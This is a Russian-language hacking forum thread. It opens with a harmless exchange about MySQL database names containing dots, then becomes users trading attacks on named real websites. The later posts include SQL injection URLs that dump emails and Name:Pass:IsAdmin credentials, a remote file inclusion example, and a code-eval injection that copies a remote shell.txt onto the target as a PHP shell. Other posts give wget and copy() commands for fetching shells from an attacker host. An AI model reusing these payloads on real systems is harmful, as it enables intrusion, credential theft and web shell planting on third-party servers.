хех,это замечательно,но в браузере такое не прокатит ведь.Я имел ввиду,что из браузера пытаюсь обратиться к скрипту таким образом,а не из phpMyAdmin или другого клиента.
такое не возможно, мускул тебе не даст создать базу с точкой, смотри там внимательнее CREATE DATABASE `lo.l`; возвращает "Incorrect database name"
Что внимательно ? Я запросил schema_name из information_schema.schemata,вот он мне и выдал такую канитель...Я бы не стал врать. Хм,твоя правда,но как тогда им такой трюк удался? Или инфа там поддельная ? database() возвращает то же самое...
Блин,ну я и лох...реально же сработал твой вариант (SELECT * FROM `database`.`table.name`).Спасибо огромное )).Я думал,что апострофы браузер не понимает,ведь так во многих манах пишут... Вопрос остается открытым - как им удалось создать имя бд с точкой ? ЗЫ: Сипт идёт лесом,т.к. не обрабатывает апострофы...
PHP: CREATE DATABASE `kiss.me`; CREATE TABLE `kiss.me`.`and_love.me` ( `its.ok` INT NOT NULL ) ENGINE = INNODB; Это весьма забавно но: PHP: CREATE DATABASE `!@#$%^&*(` ; CREATE TABLE `!@#$%^&*(`.`#$%^&*(` ( `)(*&^%$` INT NOT NULL ) ENGINE = INNODB; работает вполне адекватно PHP: INSERT INTO `#$%^&*(` VALUES ( '123' ); SELECT `)(*&^%$` FROM `#$%^&*(` WHERE 1; >> 123
у меня не катит, 5.0.24а-community-nt 5.0.51a-24+lenny5 тоже не катит что у вас за базы? версию в студию плз
OK - version():5.5.8 NOT - mysql Ver 14.12 Distrib 5.0.92, for redhat-linux-gnu (x86_64) using readline 5.1
ну все ясно, значит фича доступна начиная с версии 5.5 или как то так ибо все пятые версии провалились 5.0.92-50-log 5.0.24а-community-nt 5.0.51a-24+lenny5 5.0.92
Здравствуйте, есть RFI (пример _http://www.regentbs.ru/index2.php?id=http://www-sbras.nsc.ru/win/mathpub/page-html ), но возможно инклюдить только .html . Возможно ли залить шелл ?
Всем привет, подскажите почему не выводит нифига? PHP: http://festnevest.ru/photo_php.php?id=6+or+1+group+by+concat%28%28select+email+from+u1419187_alpha.jos_users+limit+1,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
ясно, спасибо блин, немогу подобрать количество колонок PHP: http://www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+ уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную
как сюда шелл залить? http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29; у тебя тут похоже эррор бейсед
Code: http://www.direktor.ru/opinion.htm?id=7)+and+false+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(u13567_doy.userlist)where(0x00)in(@x:=concat(@x,0x3c62723e,Name,0x3a,Pass,0x3a,IsAdmin))))x),3,4,5,6,7,8,9,10,11,12,13,14--+ e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php
пробуй так wget http://твой сайт.com/shell.php или copy("http://твой сайт.com/shell.txt","/твой путь на машине/shell.php")
не получиться: Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1 я уже что только не пробовал... fopen,include,file_get_contents,copy.....